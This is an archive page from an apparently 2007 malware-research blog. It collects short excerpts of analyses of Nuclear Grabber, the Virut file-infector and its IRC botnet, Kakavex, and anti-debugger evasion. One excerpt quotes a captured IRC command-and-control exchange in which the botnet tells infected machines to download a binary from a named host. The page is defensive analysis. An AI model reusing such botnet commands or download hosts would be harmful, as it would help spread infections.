Archive for the ‘Malware FreakShow’ Category

No honor among thieves

Friday, May 11th, 2007

You might have heard of a malware called Nuclear Grabber before. It’s a nasty trojan, written by a Russian malware writer called Corpse, that’s designed to be a flexible data-stealing platform. Nuclear Grabber is sold on a Russian site for a hefty price, and each sold version is unique and private. (more…)

Hello World!, with a twist.

Sunday, April 8th, 2007

I was digging through my stash for something interesting when I spotted a small file, only 2048 bytes in size. When looking at the strings, besides a few imports like LoadLibraryA, it contained only two strings:

Hello World!
HI THERE

There were also some garbage strings in there that looked like they had been XOR-encrypted.

(more…)

More malware from ircer.pl

Saturday, March 31st, 2007

The guys running the Virut botnet are dealing out new malware again. The new file being downloaded is about 30k in size, and it’s packed with UPX. There’s some kind of obfuscation layer on top of UPX, but it’s pretty trivial to bypass. (more…)

More malware by the Virut-gang

Monday, March 26th, 2007

The gang behind the file-infecting virus tagged as Virut are commanding more malware to be downloaded:

(more…)

Something new, something old…

Friday, March 16th, 2007

and something obese? A while back I received a sample of a file-infecting virus. AV detection is quite scarce, with Symantec detecting it as W32.kakavex, PrevX detecting it as Covert.Sys.Exec and a few others detecting it as W32.Expiro. Kakavex is quite obese compared to its brethren like Virut; it adds about 110kb to the host file’s size!

(more…)

Avoiding debugger detection

Sunday, February 25th, 2007

It’s quite common to run into malicious programs (malware) that deploy various methods to detect debuggers. It’s good to be aware of what can be thrown in your face when you’re analyzing or unpacking malware. I’ll list a few here, and some ways to circumvent them.

(more…)

The saga of Virut continues

Tuesday, February 20th, 2007

I decided to poke around Virut a bit more. I followed the IRC trail, and spotted the following:

USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif

So, what we have here is the C&C server at proxima.ircgalaxy.pl commanding the new infectees to download a binary from www.ircer.pl.

(more…)

Under the Hood: Virut

Thursday, February 15th, 2007

Virut is a weird freak amongst malware. It’s a file-infecting virus with IRC capabilities. It doesn’t use exploits to spread, but rather relies on file sharing by infecting various .exe and .scr files. (more…)
